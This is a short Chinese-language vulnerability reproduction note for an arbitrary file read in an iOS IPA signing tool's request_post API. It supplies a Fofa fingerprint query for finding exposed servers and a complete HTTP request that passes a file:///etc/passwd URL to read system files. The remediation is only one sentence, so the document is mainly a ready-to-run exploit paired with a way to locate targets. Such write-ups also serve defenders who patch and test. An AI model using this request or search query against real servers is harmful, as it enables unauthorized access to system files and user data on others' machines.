IOS-IPA签名工具 request_post 任意文件读取复现
0x01 产品描述:
苹果手机中的IPA是指iOS应用程序(iPhone应用程序)的安装包文件,其文件扩展名为.ipa。IPA文件是经过编译的、已签名的应用程序文件,可以在iOS设备上安装和运行。通常,开发者通过Xcode等开发工具来创建并编译应用程序,然后将生成的IPA文件分发给用户,用户可以通过iTunes或其他安装工具将IPA文件安装到自己的iPhone或iPad上。使用IPA文件可以安装和更新应用程序,而无需通过App Store进行下载和安装。需要注意的是,为了安全起见,iOS设备只能安装经过苹果官方认证的、由苹果App Store审核的应用程序,未授权的IPA文件可能无法安装或打开
0x02 漏洞描述:
在ios-IPA工具request_post接口中存在任意文件读取漏洞。该漏洞的存在使得攻击者可以通过精心构造的请求,直接访问服务器上的任意文件,甚至可能泄露关键的系统配置文件或用户数据。这类漏洞不仅会导致商家敏感信息的泄露,还可能给用户带来财产损失和隐私侵犯的风险
0x03 搜索语句:
Fofa:body="/assets/index/css/mobileSelect.css"
0x04 漏洞复现:
GET /api/index/request_post?url=file:///etc/passwd&post_data=test HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
0x05 修复建议:
系统需对所有用户输入的数据进行严格的验证和过滤,确保输入的文件路径合法,避免攻击者通过构造恶意路径来读取系统文件